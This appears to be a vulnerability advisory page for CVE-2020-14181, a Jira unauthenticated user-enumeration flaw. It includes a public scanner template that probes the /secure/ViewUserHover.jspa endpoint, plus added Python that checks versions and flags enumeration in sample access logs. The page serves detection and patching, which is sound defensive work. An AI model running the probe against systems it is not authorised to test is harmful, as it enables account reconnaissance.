CVE-2020-14181: Jira Unauthorized User Enumeration
Date: 2025-09-01 | Affected software: Unknown | PoC: Public
Vulnerability description
Affected versions of Atlassian Jira Server and Data Center allow an unauthenticated user to enumerate users via an Information Disclosure vulnerability in the /ViewUserHover.jspa endpoint. The affected versions are before version 7.13.6, from version 8.0.0 before 8.5.7, and from version 8.6.0 before 8.12.0.
PoC code [public]
id: CVE-2020-14181
info:
  name: Jira Unauthorized User Enumeration
  author: whwlsfb
  severity: medium
  description: |-
    Affected versions of Atlassian Jira Server and Data Center allow an unauthenticated user to enumerate users via an Information Disclosure vulnerability in the /ViewUserHover.jspa endpoint. The affected versions are before version 7.13.6, from version 8.0.0 before 8.5.7, and from version 8.6.0 before 8.12.0.
  reference:
    - https://nvd.nist.gov/vuln/detail/CVE-2020-14181
  tags: cve,cve2020,jira,enumeration
  created: 2024/04/18
set:
  r: randomLowercase(8)
rules:
  r0:
    request:
      method: GET
      path: /secure/ViewUserHover.jspa?username={{r}}
    expression: response.status == 200 && response.body.bcontains(bytes("/secure/ViewProfile.jspa?name=" + r)) && response.body.bcontains(bytes("com.atlassian.jira"))
expression: r0()
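Two things a Jira administrator wants from this page are a way to tell whether a given instance falls inside the affected version ranges quoted in the description, and a way to spot enumeration attempts against the /secure/ViewUserHover.jspa endpoint in access logs. The following Python is an added example written for this page; it is not the PoC author's code and not anything Atlassian ships. The version ranges are taken verbatim from the description above; the access-log layout (client IP, request id, authenticated user or "-" for anonymous, timestamp, request line, status) is an assumption modelled on a Tomcat-style combined log, and every log line below is constructed sample data.

```python
"""Added defensive example for CVE-2020-14181 (not part of the original page).

is_affected_version()      applies the ranges stated in the advisory text:
                           v < 7.13.6, 8.0.0 <= v < 8.5.7, 8.6.0 <= v < 8.12.0.
find_enumeration_sources() scans access-log lines for anonymous GET requests to
                           /secure/ViewUserHover.jspa and reports source IPs that
                           probe many usernames, the pattern the PoC produces.
"""
import re
import urllib.parse
from collections import defaultdict


def parse_version(v: str) -> tuple:
    """'8.5.7' -> (8, 5, 7) so that tuple comparison orders versions."""
    return tuple(int(p) for p in v.split("."))


def is_affected_version(version: str) -> bool:
    """True if the version lies in one of the affected ranges from the advisory."""
    v = parse_version(version)
    if v < parse_version("7.13.6"):
        return True
    if parse_version("8.0.0") <= v < parse_version("8.5.7"):
        return True
    if parse_version("8.6.0") <= v < parse_version("8.12.0"):
        return True
    return False


# Assumed log layout: ip requestid user [timestamp] "METHOD target PROTO" status ...
LOG_RE = re.compile(
    r'^(?P<ip>\S+) (?P<reqid>\S+) (?P<user>\S+) \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)
HOVER_PATH = "/secure/ViewUserHover.jspa"


def find_enumeration_sources(lines, threshold=5):
    """Return [(ip, hover_hits, distinct_usernames)] for anonymous sources that
    hit the hover endpoint at least `threshold` times with HTTP 200 responses.
    Authenticated hover requests are normal UI traffic and are ignored."""
    probed = defaultdict(set)   # ip -> set of username values requested
    hits = defaultdict(int)     # ip -> number of anonymous 200 responses
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue  # skip lines that do not fit the assumed layout
        if m["method"] != "GET" or m["user"] != "-" or m["status"] != "200":
            continue
        url = urllib.parse.urlsplit(m["target"])
        if url.path != HOVER_PATH:
            continue
        for name in urllib.parse.parse_qs(url.query).get("username", []):
            probed[m["ip"]].add(name)
        hits[m["ip"]] += 1
    return sorted(
        (ip, n, len(probed[ip])) for ip, n in hits.items() if n >= threshold
    )


# Constructed sample log: one anonymous source probing six usernames, one
# authenticated user using the hover card legitimately, one unrelated request,
# and one malformed line.
SAMPLE_LOG = """\
203.0.113.7 1a2b - [01/Sep/2025:10:00:01 +0000] "GET /secure/ViewUserHover.jspa?username=admin HTTP/1.1" 200 2311 45 "-" "curl/8.0"
203.0.113.7 1a2c - [01/Sep/2025:10:00:02 +0000] "GET /secure/ViewUserHover.jspa?username=jsmith HTTP/1.1" 200 2298 41 "-" "curl/8.0"
203.0.113.7 1a2d - [01/Sep/2025:10:00:02 +0000] "GET /secure/ViewUserHover.jspa?username=alice HTTP/1.1" 200 2301 39 "-" "curl/8.0"
203.0.113.7 1a2e - [01/Sep/2025:10:00:03 +0000] "GET /secure/ViewUserHover.jspa?username=bob HTTP/1.1" 200 2290 40 "-" "curl/8.0"
203.0.113.7 1a2f - [01/Sep/2025:10:00:03 +0000] "GET /secure/ViewUserHover.jspa?username=carol HTTP/1.1" 200 2305 38 "-" "curl/8.0"
203.0.113.7 1a30 - [01/Sep/2025:10:00:04 +0000] "GET /secure/ViewUserHover.jspa?username=dave HTTP/1.1" 200 2299 42 "-" "curl/8.0"
198.51.100.4 1a31 jsmith [01/Sep/2025:10:01:10 +0000] "GET /secure/ViewUserHover.jspa?username=alice HTTP/1.1" 200 2301 30 "-" "Mozilla/5.0"
198.51.100.4 1a32 jsmith [01/Sep/2025:10:01:15 +0000] "GET /secure/ViewUserHover.jspa?username=bob HTTP/1.1" 200 2290 31 "-" "Mozilla/5.0"
203.0.113.7 1a33 - [01/Sep/2025:10:02:00 +0000] "GET /browse/ABC-1 HTTP/1.1" 200 8120 60 "-" "curl/8.0"
this line is not in the expected format
"""


if __name__ == "__main__":
    for ver in ("7.13.5", "8.5.7", "8.11.1", "8.12.0"):
        print(ver, "affected" if is_affected_version(ver) else "fixed")
    print(find_enumeration_sources(SAMPLE_LOG.splitlines()))
```

The detector keys on the combination that makes this issue exploitable: no authenticated user on the request, a 200 response, and many distinct username values from one source in a short window; a single anonymous hover request is not by itself suspicious. Running the script prints the affected/fixed status of the four sample versions and `[('203.0.113.7', 6, 6)]` for the constructed log.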